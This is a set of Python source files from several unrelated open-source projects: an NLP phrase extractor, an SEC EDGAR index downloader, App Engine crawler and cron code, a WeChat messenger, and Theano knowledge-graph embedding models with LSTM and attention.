cluster_centers, dtype=torch.float, requires_grad=True, device=self.luke.device)
self.cluster_centers = Parameter(initial_cluster_centers)
```
#### File: UCTopic/uctopic/utils.py
```python
from typing import List
import spacy
from numpy import ndarray
from tqdm import tqdm
from multiprocessing import Pool
try:
NLP = spacy.load('en_core_web_sm', disable=['ner', 'token2vec'])
except OSError:  # model not installed yet
import os
os.system("python -m spacy download en_core_web_sm")
NLP = spacy.load('en_core_web_sm', disable=['ner', 'token2vec'])
class NounPhraser:
@staticmethod
def process_data(data: List,
num_workers: int = 8):
sentence_dict = dict()
phrase_list = []
for doc_id, sentence in enumerate(data):
sentence_dict[doc_id] = sentence
pool = Pool(processes=num_workers)
pool_func = pool.imap(func=NounPhraser.rule_based_noun_phrase, iterable=sentence_dict.items())
doc_tuples = list(tqdm(pool_func, total=len(sentence_dict), desc=f'Extract phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
return sentence_dict, phrase_list
@staticmethod
def rule_based_noun_phrase(line):
definite_articles = {'a', 'the', 'an', 'this', 'those', 'that', 'these', \
'my', 'his', 'her', 'your', 'their', 'our'}
doc_id, text = line
if not text:
return []
doc = NLP(text)
phrases = []
for chunk in doc.noun_chunks:
start, end = chunk.start, chunk.end ## token-level idx
if len(chunk.text.split()) > 1:
left_p = '(' in chunk.text
right_p = ')' in chunk.text
if left_p == right_p:
ps = chunk.text
if ps.split(" ")[0].lower() in definite_articles:
new_ps = " ".join(ps.split(" ")[1:])
start_char = chunk.start_char + len(ps) - len(new_ps)
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start+1, end)])
assert doc.text[start_char:chunk.end_char] == new_ps
phrases.append((doc_id, start_char, chunk.end_char, span_lemma))
else:
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
else:
if doc[chunk.start].pos_ != 'PRON':
span_lemma = ' '.join([doc[i].lemma_.lower().strip() for i in range(start, end)])
phrases.append((doc_id, chunk.start_char, chunk.end_char, span_lemma))
return phrases
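    # Usage sketch (illustrative; assumes the spaCy model loaded above is available):
    #
    #     sentences = ["The new coffee shop serves great espresso."]
    #     sentence_dict, phrases = NounPhraser.process_data(sentences, num_workers=1)
    #     # each entry of `phrases` is (doc_id, start_char, end_char, lemmatized span),
    #     # with leading articles such as "The" stripped by the rule above.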
class Lemmatizer:
@staticmethod
def process_data(sentences: List,
spans: List,
num_workers: int = 8):
instance_dict = dict()
phrase_list = []
for doc_id, instance in enumerate(zip(sentences, spans)):
instance_dict[doc_id] = instance
pool = Pool(processes=num_workers)
pool_func = pool.imap(func=Lemmatizer._process, iterable=instance_dict.items())
doc_tuples = list(tqdm(pool_func, total=len(instance_dict), desc=f'Normalize phrases'))
for phrases in doc_tuples:
phrase_list += phrases
pool.close()
pool.join()
sentence_dict = dict()
for doc_id, instance in instance_dict.items():
sentence = instance[0]
sentence_dict[doc_id] = sentence
return sentence_dict, phrase_list
@staticmethod
def _process(line):
doc_id, (sentence, spans) = line
phrases = []
for span in spans:
phrase = sentence[span[0]: span[1]]
span_lemma = Lemmatizer.normalize(phrase)
phrases.append((doc_id, span[0], span[1], span_lemma))
return phrases
@staticmethod
def normalize(text):
doc = NLP(text)
return ' '.join([token.lemma_.lower().strip() for token in doc])
def get_rankings(scores: ndarray, positive_ratio: float = 0.8):
'''
scores: (samples, class_num)
'''
class_num = scores.shape[-1]
rankings = (-scores).argsort(axis=0) #(samples, class_num)
rankings = rankings[:int(len(rankings) * 1.0 / class_num * positive_ratio)]
return rankings
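# Worked example (illustrative): with `scores` of shape (100, 5) and
# positive_ratio=0.8, each column of `rankings` lists sample indices sorted by
# descending score for that class, truncated to the top
# int(100 * 1.0 / 5 * 0.8) = 16 rows, i.e. the most confident candidates per class.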
``` |
{
"source": "Jiacheng-Liu/python-edgar",
"score": 3
} |
#### File: python-edgar/edgar/main.py
```python
from __future__ import print_function
import multiprocessing
import os
import datetime
import zipfile
import tempfile
import logging
import os.path
import sys
import io
EDGAR_PREFIX = "https://www.sec.gov/Archives/"
SEP = "|"
IS_PY3 = sys.version_info[0] >= 3
def _worker_count():
cpu_count = 1
try:
cpu_count = len(os.sched_getaffinity(0))
except AttributeError:
cpu_count = multiprocessing.cpu_count()
return cpu_count
def _get_current_quarter():
return "QTR%s" % ((datetime.date.today().month - 1) // 3 + 1)
def _quarterly_idx_list(since_year=1993):
"""
Generate the list of quarterly zip files archived in EDGAR
since 1993 until this previous quarter
"""
logging.debug("downloading files since %s" % since_year)
years = range(since_year, datetime.date.today().year + 1)
quarters = ["QTR1", "QTR2", "QTR3", "QTR4"]
history = list((y, q) for y in years for q in quarters)
history.reverse()
quarter = _get_current_quarter()
while history:
_, q = history[0]
if q == quarter:
break
else:
history.pop(0)
return [
(
EDGAR_PREFIX + "edgar/full-index/%s/%s/master.zip" % (x[0], x[1]),
"%s-%s.tsv" % (x[0], x[1]),
)
for x in history
]
def _append_html_version(line):
chunks = line.split(SEP)
return line + SEP + chunks[-1].replace(".txt", "-index.html")
def _skip_header(f):
for x in range(0, 11):
f.readline()
def _url_get(url):
content = None
if IS_PY3:
# python 3
import urllib.request
content = urllib.request.urlopen(url).read()
else:
# python 2
import urllib2
content = urllib2.urlopen(url).read()
return content
def _download(file, dest, skip_file):
"""
Download an idx archive from EDGAR
This will read idx files and unzip
archives + read the master.idx file inside
when skip_file is True, it will skip the file if it's already present.
"""
if not dest.endswith("/"):
dest = "%s/" % dest
url = file[0]
dest_name = file[1]
if skip_file and os.path.exists(dest+dest_name):
logging.info("> Skipping %s" % (dest_name))
return
if url.endswith("zip"):
with tempfile.TemporaryFile(mode="w+b") as tmp:
tmp.write(_url_get(url))
with zipfile.ZipFile(tmp).open("master.idx") as z:
with io.open(dest + dest_name, "w+", encoding="utf-8") as idxfile:
_skip_header(z)
lines = z.read()
if IS_PY3:
lines = lines.decode("latin-1")
lines = map(
lambda line: _append_html_version(line), lines.splitlines()
)
idxfile.write("\n".join(lines))
logging.info("> downloaded %s to %s%s" % (url, dest, dest_name))
else:
        logging.error("python-edgar only supports zipped index files")
        raise ValueError("python-edgar only supports zipped index files")
def download_index(dest, since_year, skip_all_present_except_last=False):
"""
Convenient method to download all files at once
"""
if not os.path.exists(dest):
os.makedirs(dest)
tasks = _quarterly_idx_list(since_year)
logging.info("%d index files to retrieve", len(tasks))
worker_count = _worker_count()
logging.debug("worker count: %d", worker_count)
pool = multiprocessing.Pool(worker_count)
for i, file in enumerate(tasks):
skip_file = skip_all_present_except_last
if i == 0:
# First one should always be re-downloaded
skip_file = False
pool.apply_async(_download, (file, dest, skip_file))
pool.close()
pool.join()
logging.info("complete")
``` |
{
"source": "jiachengpan/gae-crawler",
"score": 2
} |
#### File: gae-crawler/models/cron.py
```python
from google.appengine.ext import ndb
from google.appengine.api import memcache
from enum import Enum
class Interval(Enum):
ONE_HOUR = '1hour'
FIVE_MIN = '5min'
class CronJobs(ndb.Model):
interval = ndb.StringProperty(
choices=[member.value for name, member in Interval.__members__.items()])
type_name = ndb.StringProperty()
name = ndb.StringProperty()
parameters = ndb.JsonProperty()
last_update = ndb.DateTimeProperty(auto_now=True)
@classmethod
def get_jobs_by_interval(cls, interval):
ret = CronJobs.query(CronJobs.interval == interval).fetch(1000)
ret = [(r.type_name, r.name, r.parameters) for r in ret]
return ret
@classmethod
def get_jobs_by_type(cls, type_name):
ret = CronJobs.query(CronJobs.type_name == type_name).fetch(1000)
ret = [(r.type_name, r.name, r.parameters) for r in ret]
return ret
@classmethod
def add_job(cls, interval, type_name, name, parameters):
job_key = ndb.Key(cls, type_name + name)
if job_key.get(): return False
CronJobs(
key=job_key,
interval=interval,
type_name=type_name,
name=name,
parameters=parameters).put()
return True
@classmethod
def delete_job(cls, type_name, name):
ret = CronJobs.query(CronJobs.type_name == type_name, CronJobs.name == name).fetch(1000)
for r in ret:
r.key.delete()
return True
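# Usage sketch (illustrative; assumes a Google App Engine runtime where ndb is available):
#
#     CronJobs.add_job(Interval.FIVE_MIN.value, 'smzdm', 'deals',
#                      {'url': 'http://example.com/search', 'max_count': 20})
#     jobs = CronJobs.get_jobs_by_interval(Interval.FIVE_MIN.value)
#     # -> [('smzdm', 'deals', {'url': 'http://example.com/search', 'max_count': 20})]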
```
#### File: gae-crawler/proc/smzdm.py
```python
from bs4 import BeautifulSoup
from google.appengine.api import urlfetch
from google.appengine.api import memcache
from .proc_base import ProcedureBase
import logging
import gzip
import StringIO
HEADER = {
"User-Agent": 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36',
"Accept-Encoding": 'gzip',
"Accept-Language": 'zh,en-GB;q=0.8,en;q=0.6,en-US;q=0.4,zh-CN;q=0.2,zh-TW;q=0.2',
"Cookie": '__jsluid=69a744636a7d40e0aaf3730b176362ef; __jsl_clearance=1459684554.195|0|8CbvqQarDel3APMwTv923Kyhjoc%3D; smzdm_user_view=D5213364B546447774E885FEBBC186CC; smzdm_user_source=141572A247975F7D044FC79D7F822D52; PHPSESSID=794mdvr6kf6m0geundkht8nlu4; amvid=357b4c03b22e0a122677805bf58b6cfb',
}
# WIP
class ProcedureSMZDM(ProcedureBase):
@classmethod
def do_work_core(cls, args):
max_count = 100
if 'max_count' in args:
max_count = args['max_count']
try:
ret = urlfetch.fetch(
url=args['url'],
follow_redirects=True,
headers=HEADER,
deadline=60,
)
except Exception as e:
logging.error(e.message)
return []
if ret.status_code not in (200, 302):
logging.error('URL Fetch failed. status {0}; url {1}.'.format(ret.status_code, args['url']))
#return []
try:
content = gzip.GzipFile(fileobj=StringIO.StringIO(ret.content)).read()
except IOError:
content = ret.content
if not content:
logging.error('empty file')
return None
logging.info(content)
soup = BeautifulSoup(content, 'lxml')
items = soup.find_all('div', attrs={'class': 'search-list'})
result = []
msg = {}
for item in items[:max_count]:
title = item.find('div', attrs={'class': 'list-title'}).get_text().strip()
            detail = item.find('div', attrs={'class': 'list-detail'}).get_text().strip()
result.append((title, detail))
return result
``` |
{
"source": "jiachengpan/wechat-rent",
"score": 2
} |
#### File: jiachengpan/wechat-rent/messenger.py
```python
from wechat_web import Wechat
import wechat_config
import logging
from google.appengine.api import memcache
cache_key = 'WECHAT_SESSION'
client = memcache.get(cache_key)
if not client:
try:
client = Wechat(wechat_config.account_name, wechat_config.account_passwd)
client.login()
client.get_fakeid()
client.get_available_users()
memcache.set(cache_key, client)
except Exception as e:
logging.error(repr(e))
def send_message(fake_id, message):
try:
client.send_message(fake_id, message)
except Exception as e:
logging.error(repr(e))
return False
return True
```
#### File: wechat-rent/utils/memcache.py
```python
from google.appengine.api import memcache
import pickle
def store(key, value, chunksize=950000):
serialized = pickle.dumps(value, 2)
values = {}
for i in xrange(0, len(serialized), chunksize):
values['%s.%s' % (key, i//chunksize)] = serialized[i : i+chunksize]
return memcache.set_multi(values)
def retrieve(key):
result = memcache.get_multi(['%s.%s' % (key, i) for i in xrange(32)])
serialized = ''.join([v for k, v in sorted(result.items()) if v is not None])
return pickle.loads(serialized)
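# Usage sketch (illustrative; assumes the App Engine memcache service). Values are
# pickled and split into ~950 KB chunks so each entry stays under memcache's 1 MB
# per-value limit; retrieve() reassembles up to 32 such chunks:
#
#     store('big_result', {'rows': list(range(10 ** 6))})
#     data = retrieve('big_result')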
``` |
{
"source": "jiachengx/cameracontrol",
"score": 3
} |
#### File: jiachengx/cameracontrol/camcapture.py
```python
import sys
import platform
import cv2
import datetime
if len(sys.argv) > 1:
if sys.argv[1] == "--help":
print("Usage: \n\t{0} [camera output size] e.g {1} 1280x720".format(sys.argv[0], sys.argv[0]))
sys.exit(0)
width, height = int(str(sys.argv[1]).split("x")[0]), int(str(sys.argv[1]).split("x")[1])
else:
width, height = 640, 480
def main():
cap = cv2.VideoCapture(0)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
if 'Windows' not in platform.system():
print("This app does NOT support non-windows platform.")
sys.exit(1)
encode = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter("camcapvid_" + f"{datetime.datetime.now():%Y%m%d_%H%M%S}" + ".avi" , encode, 20.0, (width, height))
while cap.isOpened():
ret, frame = cap.read()
if ret:
frame = cv2.flip(frame, 0)
out.write(frame)
cv2.imshow("Press 'q' to exit and export the output.avi video file in current folder.", frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
out.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main()
``` |
{
"source": "jiachengx/MicroPython_ESP",
"score": 3
} |
#### File: MicroPython_ESP/heroku-line-app/app.py
```python
from __future__ import unicode_literals
from flask import Flask, request
import pprint
import json
import requests
app = Flask(__name__)
@app.route('/')
def homepage():
return "Done"
###############
# Line API
###############
@app.route('/line', methods=['GET', 'POST'])
def line():
url = "https://notify-api.line.me/api/notify"
token = request.args.get('token')
message = request.args.get('message')
headers = {"Authorization" : "Bearer "+ token}
payload = {"message" : message}
try:
r = requests.post(url ,headers = headers ,params=payload)
except Exception as ex:
print('line_notify() error: ', str(ex))
return 'ERROR'
return 'Done'
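# Example client call (illustrative; the host name is a placeholder). Any HTTP
# client, e.g. an ESP board, can push a LINE Notify message through this proxy:
#
#     import requests
#     requests.get("https://<your-app>.herokuapp.com/line",
#                  params={"token": "<LINE Notify token>", "message": "hello"})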
@app.route('/line2', methods=['GET', 'POST'])
def line2():
url = "https://notify-api.line.me/api/notify"
print('--.__dict__--')
pprint.pprint(request.__dict__)
print('--.data--')
pprint.pprint(request.data)
print('--.form--')
pprint.pprint(request.form)
print('--.args--')
pprint.pprint(request.args)
print('----')
'''
token = request.form['token']
message = request.form['message']
print(token, message)
'''
data = json.loads(request.data)
token = data['token']
message = data['message']
headers = {"Authorization" : "Bearer "+ token}
payload = {"message" : message}
try:
r = requests.post(url ,headers = headers ,params=payload)
except Exception as ex:
print('line_notify() error: ', str(ex))
return 'ERROR: '+str(ex)
return 'Done'
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
``` |
{
"source": "jiacheng-xu/Attn-KGE",
"score": 2
} |
#### File: Attn-KGE/LSTM_fix/cbow_att_launch.py
```python
__author__ = 'kanchan'
from util import *
from module import *
import theano
def transe(tparams, options, h_pos, t_pos, h_neg, t_neg, r_emb):
if options['distance'] == 'l1':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.abs_(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.abs_(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
elif options['distance'] == 'l2':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.sqr(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.sqr(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
else:
raise NotImplementedError('Illegal distance measure.')
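# Note (descriptive comment, added for clarity): this is the standard TransE margin
# ranking loss, max(0, margin + d(h + r, t) - d(h' + r', t')), where d is the L1 or
# L2 distance, (h, r, t) is the observed triple and the primed terms come from the
# corrupted sample; r_emb[:, 0, :] is the relation paired with the positive triple
# and r_emb[:, 1, :] the one paired with the negative.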
# def dist_loss(tparams, options, h, h_text, t, t_text):
# return tensor.sum(tensor.sqr(h - h_text), axis=1) + tensor.sum(tensor.sqr(t - t_text), axis=1)
def calc_distance(tparams, options, h, r, t):
pass
def init_params(options):
params = OrderedDict()
if options['wdim'] != options['edim']:
W = ortho_weight(indim=options['wdim'], outdim=options['edim'])
params['cbow_W'] = W
if options['model_name'].endswith('gate'):
params['gate_emb'] = ortho_weight(options['ent_num'], options['edim'])
elif options['model_name'].endswith('gate_pro'):
params['gate_U'] = ortho_weight(options['edim'])
params['gate_W'] = ortho_weight(options['edim'])
params['gate_b'] = numpy.random.uniform(low=-.1,high=.1,size=(options['edim'],)).astype(config.floatX)
params = param_init_cbow(options, params, prefix='cbow', in_dim=options['wdim'], out_dim=options['edim'])
return params
def build_model(tparams, options, ttparams=None):
if ttparams == None:
ttparams = tparams
print 'Model: cbow'
use_noise = theano.shared(numpy_floatX(0.))
# head and tail load
ht = tensor.matrix('ht_triplet', dtype='int64')
r = tensor.matrix('r_triplet', dtype='int64')
n_samples = ht.shape[0]
ent_emb = ttparams['ent_emb'][ht.flatten()]
ent_emb = ent_emb.reshape([n_samples, 4, options['edim']])
# relation load
# Naive approach
rel_emb = ttparams['rel_emb'][r.flatten()]
rel_emb = rel_emb.reshape([n_samples, 2, options['edim']])
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth lenth, batch_size*4
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
# rt_text = lstm(tparams, text_emb, options, mask=mask,in_dim=options['wdim'],out_dim=options['edim'])
# end_step = rt_text[-1]
end_step = cbow(tparams, text_emb, options, prefix='cbow', mask=mask, in_dim=options['wdim'],
out_dim=options['edim'])
if options['loss5']:
end_step = tensor.nnet.sigmoid(end_step)
#
if options['wdim'] != options['edim']:
end_step = theano.tensor.dot(end_step, tparams['cbow_W'])
# assert end_step.shape[0] % 4 == 0
h_pos_text, t_pos_text, h_neg_text, t_neg_text = end_step[0:r.shape[0]], \
end_step[r.shape[0]: r.shape[0] * 2], \
end_step[r.shape[0] * 2:r.shape[0] * 3], \
end_step[r.shape[0] * 3:r.shape[0] * 4],
# h_pos, t_pos, h_neg, t_neg, r_emb
# h + r - t
cost_ori = transe(tparams, options, ent_emb[:, 0, :], ent_emb[:, 1, :], ent_emb[:, 2, :], ent_emb[:, 3, :], rel_emb)
# h_rnn +r -t
cost_h_text = transe(tparams, options, h_pos_text, ent_emb[:, 1, :], h_neg_text, ent_emb[:, 3, :], rel_emb)
# h+r-rnn_t
cost_t_text = transe(tparams, options, ent_emb[:, 0, :], t_pos_text, ent_emb[:, 2, :], t_neg_text, rel_emb)
# h_rnn + r - t_rnn
cost_mul_text = transe(tparams, options, h_pos_text, t_pos_text, h_neg_text, t_neg_text, rel_emb)
f_loss_cost_ori = theano.function([ht, r, text, mask], outputs=cost_ori, updates=None, on_unused_input='ignore')
cost_ori_mean = cost_ori.mean()
f_loss_cost_h_text = theano.function([ht, r, text, mask], outputs=cost_h_text, updates=None,
on_unused_input='ignore')
cost_h_text_mean = cost_h_text.mean()
f_loss_cost_t_text = theano.function([ht, r, text, mask], outputs=cost_t_text, updates=None,
on_unused_input='ignore')
cost_t_text_mean = cost_t_text.mean()
f_loss_cost_mul_text = theano.function([ht, r, text, mask], outputs=cost_mul_text, updates=None,
on_unused_input='ignore')
cost_mul_text_mean = cost_mul_text.mean()
return use_noise, ht, r, text, mask, \
f_loss_cost_ori, cost_ori_mean, \
f_loss_cost_h_text, cost_h_text_mean, \
f_loss_cost_t_text, cost_t_text_mean, \
f_loss_cost_mul_text, cost_mul_text_mean
def build_test(tparams, options):
print 'Test Model: cbow'
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth_len, batch_size
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
# rt_text = lstm(tparams, text_emb, options, mask=mask,in_dim=options['wdim'],out_dim=options['edim'])
# end_step = rt_text[-1]
end_step = cbow(tparams, text_emb, options, prefix='cbow', mask=mask)
if options['wdim'] != options['edim']:
end_step = theano.tensor.dot(end_step, tparams['cbow_W'])
return text, mask, end_step
```
#### File: Attn-KGE/LSTM_fix/lstm_launch.py
```python
from util import *
from module import *
import theano
def transe(tparams, options, h_pos, t_pos, h_neg, t_neg, r_emb):
if options['distance'] == 'l1':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.abs_(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.abs_(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
elif options['distance'] == 'l2':
return tensor.maximum(0, options['margin'] + tensor.sum(tensor.sqr(h_pos + r_emb[:, 0, :] - t_pos), axis=1) - \
tensor.sum(tensor.sqr(h_neg + r_emb[:, 1, :] - t_neg), axis=1))
else:
raise NotImplementedError('Illegal distance measure.')
def init_params(options):
params = OrderedDict()
if options['model_name'].endswith('gate'):
params['gate_emb'] = ortho_weight(options['ent_num'], options['edim'])
elif options['model_name'].endswith('gate_pro'):
params['gate_U'] = ortho_weight(options['edim'])
params['gate_W'] = ortho_weight(options['edim'])
params['gate_b'] = numpy.random.uniform(low=-.1, high=.1, size=(options['edim'],)).astype(config.floatX)
elif options['model_name'].endswith('gate_s'):
params['gate_s'] = numpy.random.uniform(low=-.1, high=.3, size=(options['ent_num'],1)).astype(config.floatX)
if options['model_name'].find('att') != -1:
params = param_init_attention(options, params, prefix='attention', dim=options['edim'])
params = param_init_lstm(options, params, prefix='lstm', in_dim=options['wdim'], out_dim=options['edim'])
return params
def build_model(tparams, options, ttparams=None):
if ttparams == None:
ttparams = tparams
print 'Model: %s' % (options['model_name'])
trng = RandomStreams(817)
use_noise = theano.shared(numpy_floatX(0.))
# head and tail load
ht = tensor.matrix('ht_triplet', dtype='int64')
r = tensor.matrix('r_triplet', dtype='int64')
# assert ht.shape[0] == r.shape[0]
n_samples = ht.shape[0]
ent_emb = ttparams['ent_emb'][ht.flatten()]
ent_emb = ent_emb.reshape([n_samples, 4, options['edim']])
# relation load
# Naive approach
rel_emb = ttparams['rel_emb'][r.flatten()]
rel_emb = rel_emb.reshape([n_samples, 2, options['edim']])
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
#
# text input shape : seqth lenth, batch_size*4
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
rt_text = lstm(tparams, text_emb, options, mask=mask, in_dim=options['wdim'], out_dim=options['edim'])
# 97, 16, 128
if options['use_noise'] > 0.:
rt_text = dropout_layer(rt_text, use_noise, trng)
# assert end_step.shape[0] % 4 == 0
# h_pos, t_pos, h_neg, t_neg, r_emb
if options['model_name'].find('att') != -1:
h_pos_text, t_pos_text, h_neg_text, t_neg_text = rt_text[:, 0:r.shape[0], :], \
rt_text[:, r.shape[0]: r.shape[0] * 2, :], \
rt_text[:, r.shape[0] * 2:r.shape[0] * 3, :], \
rt_text[:, r.shape[0] * 3:r.shape[0] * 4, :]
pos_relation = rel_emb[:, 0, :].reshape([n_samples, options['edim']])
neg_relation = rel_emb[:, 1, :].reshape([n_samples, options['edim']])
h_pos_text = attention(tparams, h_pos_text, pos_relation, options, prefix='attention',
mask=mask[:, 0:r.shape[0]])
t_pos_text = attention(tparams, t_pos_text, pos_relation, options, prefix='attention',
mask=mask[:, r.shape[0]:r.shape[0] * 2])
h_neg_text = attention(tparams, h_neg_text, neg_relation, options, prefix='attention',
mask=mask[:, r.shape[0] * 2:r.shape[0] * 3])
t_neg_text = attention(tparams, t_neg_text, neg_relation, options, prefix='attention',
mask=mask[:, r.shape[0] * 3:r.shape[0] * 4])
# Assertion test
h_pos_text = h_pos_text.reshape((r.shape[0], options['edim']))
#####
end_step = tensor.concatenate([h_pos_text, t_pos_text, h_neg_text, t_neg_text], axis=0)
# end_step = concatenate([h_pos_text, t_pos_text, h_neg_text, t_neg_text], axis=0) # 4 * nsamples, dim
else:
# h_pos_text, t_pos_text, h_neg_text, t_neg_text = h_pos_text[-1], t_pos_text[-1], h_neg_text[-1], t_neg_text[-1]
# end_step = rt_text[-1]
proj = (rt_text * mask[:, :, None]).sum(axis=0)
end_step = proj / mask.sum(axis=0)[:, None]
h_pos_text, t_pos_text, h_neg_text, t_neg_text = end_step[0:r.shape[0]], \
end_step[r.shape[0]: r.shape[0] * 2], \
end_step[r.shape[0] * 2:r.shape[0] * 3], \
end_step[r.shape[0] * 3:r.shape[0] * 4],
# gate
f_loss_cost_gate, cost_gate_mean = None, None
if options['model_name'].endswith('gate'):
gate_emb = tparams['gate_emb'][ht.flatten()]
gate_emb = gate_emb.reshape([n_samples, 4, options['edim']])
sig_gate = tensor.nnet.sigmoid(gate_emb)
gated_state = sig_gate * ent_emb + (1 - sig_gate) * (
end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
elif options['model_name'].endswith('gate_pro'):
# n_samples, 4, edim
txt = (end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
alpha = tensor.nnet.sigmoid(tensor.dot(txt, tparams['gate_W']) +
tensor.dot(ent_emb, tparams['gate_U']) + tparams['gate_b'])
gated_state = alpha * ent_emb + (1 - alpha) * txt
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
elif options['model_name'].endswith('gate_s'):
###############TODO
gate_emb = tparams['gate_s'][ht.flatten()]
gate_emb = gate_emb.reshape([n_samples, 4])
sig_gate = tensor.nnet.sigmoid(gate_emb)
sig_gate = sig_gate[:,:,None]
gated_state = sig_gate * ent_emb + (1 - sig_gate) * (
end_step.reshape((4, n_samples, options['edim']))).dimshuffle([1, 0, 2])
cost_gate = transe(tparams, options, gated_state[:, 0, :],
gated_state[:, 1, :], gated_state[:, 2, :],
gated_state[:, 3, :],
rel_emb)
f_loss_cost_gate = theano.function([ht, r, text, mask], outputs=cost_gate, updates=None,
on_unused_input='ignore')
cost_gate_mean = cost_gate.mean()
# h + r - t
cost_ori = transe(tparams, options, ent_emb[:, 0, :], ent_emb[:, 1, :], ent_emb[:, 2, :], ent_emb[:, 3, :], rel_emb)
# h_rnn +r -t
cost_h_text = transe(tparams, options, h_pos_text, ent_emb[:, 1, :], h_neg_text, ent_emb[:, 3, :], rel_emb)
# h+r-rnn_t
cost_t_text = transe(tparams, options, ent_emb[:, 0, :], t_pos_text, ent_emb[:, 2, :], t_neg_text, rel_emb)
# h_rnn + r - t_rnn
cost_mul_text = transe(tparams, options, h_pos_text, t_pos_text, h_neg_text, t_neg_text, rel_emb)
f_loss_cost_ori = theano.function([ht, r, text, mask], outputs=cost_ori, updates=None, on_unused_input='ignore')
cost_ori_mean = cost_ori.mean()
f_loss_cost_h_text = theano.function([ht, r, text, mask], outputs=cost_h_text, updates=None,
on_unused_input='ignore')
cost_h_text_mean = cost_h_text.mean()
f_loss_cost_t_text = theano.function([ht, r, text, mask], outputs=cost_t_text, updates=None,
on_unused_input='ignore')
cost_t_text_mean = cost_t_text.mean()
f_loss_cost_mul_text = theano.function([ht, r, text, mask], outputs=cost_mul_text, updates=None,
on_unused_input='ignore')
cost_mul_text_mean = cost_mul_text.mean()
return use_noise, ht, r, text, mask, \
f_loss_cost_ori, cost_ori_mean, \
f_loss_cost_h_text, cost_h_text_mean, \
f_loss_cost_t_text, cost_t_text_mean, \
f_loss_cost_mul_text, cost_mul_text_mean, \
f_loss_cost_gate, cost_gate_mean
def build_test(tparams, options, ttparams=None, relation_vec=True):
if ttparams == None:
ttparams = tparams
trng = RandomStreams(45678)
print 'Test Model: lstm'
use_noise = theano.shared(numpy_floatX(0.))
text = tensor.matrix('text', dtype='int64')
mask = tensor.matrix('text_mask')
if relation_vec:
relation = tensor.vector('relation')
else:
relation = tensor.matrix('relation')
#
# text input shape : seqth_len, batch_size
#
# assert text.shape[1] == r.shape[0] * 4
text_emb = tparams['word_emb'][text.flatten()]
text_emb = text_emb.reshape([text.shape[0], text.shape[1], options['wdim']])
end_step = lstm(tparams, text_emb, options, mask=mask, in_dim=options['wdim'], out_dim=options['edim'])
if options['use_noise'] > 0.:
end_step = dropout_layer(end_step, use_noise, trng)
# assert end_step.shape[0] % 4 == 0
# h_pos, t_pos, h_neg, t_neg, r_emb
if options['model_name'].find('att') != -1:
end_step, alpha = attention(tparams, end_step, relation, options, prefix='attention', mask=mask)
else:
# proj = (end_step * mask[:, :, None]).sum(axis=0)
# end_step = proj / mask.sum(axis=0)[:, None]
pass
# gate
# TODO
# alpha = None
if options['model_name'].endswith('gate'):
gate_emb = tparams['gate_emb']
alpha = tensor.nnet.sigmoid(gate_emb)
gated_state = alpha * ttparams['ent_emb'] + (1 - alpha) * end_step
end_step = gated_state
elif options['model_name'].endswith('gate_pro'):
# n_samples, 4, edim
txt = end_step
alpha = tensor.nnet.sigmoid(tensor.dot(txt, tparams['gate_W']) +
tensor.dot(ttparams['ent_emb'], tparams['gate_U']) + tparams['gate_b'])
gated_state = alpha * ttparams['ent_emb'] + (1 - alpha) * txt
end_step = gated_state
elif options['model_name'].endswith('gate_s'):
gate_emb = tparams['gate_s']
sig_gate = tensor.nnet.sigmoid(gate_emb)
gated_state = sig_gate * ttparams['ent_emb'] + (1 - sig_gate) * end_step
end_step = gated_state
return text, mask, relation, end_step
```
#### File: Attn-KGE/LSTM_fix/rnn_batch_att.py
```python
import theano
import sys
from generate_data import generate_train_data, CharacterTable
import pdb
import numpy
import numpy as np
import os
from theano import tensor as T
from collections import OrderedDict
theano.config.mode = 'FAST_COMPILE'
class model(object):
def __init__(self, nh, nc, ne, natt, batch_size=64, attention_type='no_attention'):
'''
nh :: dimension of the hidden layer
nc :: number of classes
ne :: number of word embeddings in the vocabulary
natt :: dimension of hidden attention layer
'''
